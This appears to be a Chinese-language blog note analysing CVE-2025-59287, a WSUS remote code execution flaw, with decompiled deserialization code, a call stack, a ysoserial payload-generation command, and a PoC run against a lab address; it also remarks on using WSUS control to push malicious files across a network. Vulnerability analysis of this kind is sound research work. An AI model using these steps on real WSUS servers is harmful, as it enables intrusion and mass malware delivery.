CVE-2025-59287 WSUS RCE

CVE-2025-59287 WSUS RCE

此漏洞源于发送到 SimpleAuthWebService/SimpleAuth.asmx​端点的获取Cookie Bypass 认证,并通过/ReportingWebService/ReportingWebService.asmx安全的反序列化问题,导致攻击者能够执行远程代码。

  • 致谢

    1. CVE-2025-59287-UNAUTH
    2. poc

  • 什么是WSUS

    WSUS(Windows Server Update Services) 是一款 Microsoft 工具,允许 IT 管理员管理和分发 Windows 系统的更新。WSUS 客户端通过 Web 与 WSUS 服务器通信,以接收更新并确保安全。

    内网横向,通过控制WSUS可以批量下发恶意文件,扩大战果 -.)

  • 搭建

    官方文档

  • 分析

    反序列化

    public static object DeserializeObject(byte[] bytes)
		{
			SoapFormatter soapFormatter = new SoapFormatter();
			soapFormatter.Binder = new WSUSDeserializationBinder("Microsoft.UpdateServices.Administration");
			if (bytes == null)
			{
				throw new ArgumentNullException("bytes");
			}
			MemoryStream memoryStream = new MemoryStream(bytes);
			return soapFormatter.Deserialize(memoryStream);
		}

    算了,文章写的很详细,自己跟调试下就行了。

    调用堆栈跟踪

    Microsoft.UpdateServices.Internal.SoapUtilities.DeserializeObject(byte[]) : object @06000158
	Used By
		Microsoft.UpdateServices.Internal.BaseApi.BaseEvent.ConvertXmlToObject(string) : object @060003B8
			Used By
				Microsoft.UpdateServices.Internal.BaseApi.SubscriptionEvent.PopulateSubscriptionEventProperties() : void @06000552
					Overridden By
					Used By
						Microsoft.UpdateServices.Internal.BaseApi.SubscriptionEvent.SubscriptionEvent(EventHistoryTableRow) : void @06000544
							Used By
								Microsoft.UpdateServices.Internal.BaseApi.SubscriptionEvent.GetEventHistory(DateTime, DateTime, UpdateServer) : SubscriptionEventCollection @0600054A

  • 验证

    ysoserial.exe -f BinaryFormatter -g TextFormattingRunProperties -o base64 -c "echo pwned 
 > C:\Windows\Temp\PWNED.txt"

    替换选中区域

    image

    python 1.py http://192.168.116.136:8530

    image

    image

  • 注意

    1. network service 权限
    2. 延迟触发